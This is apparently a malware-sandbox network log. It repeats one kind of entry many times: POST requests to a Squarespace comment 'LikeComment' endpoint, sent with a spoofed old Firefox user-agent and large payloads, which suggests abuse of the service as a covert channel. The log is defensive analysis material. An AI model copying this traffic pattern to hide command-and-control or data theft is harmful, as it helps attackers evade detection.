Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116736Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108438Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108436Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108436Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108436Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 336Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108436Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108436Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108438Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108438Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108438Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108438Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108438Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
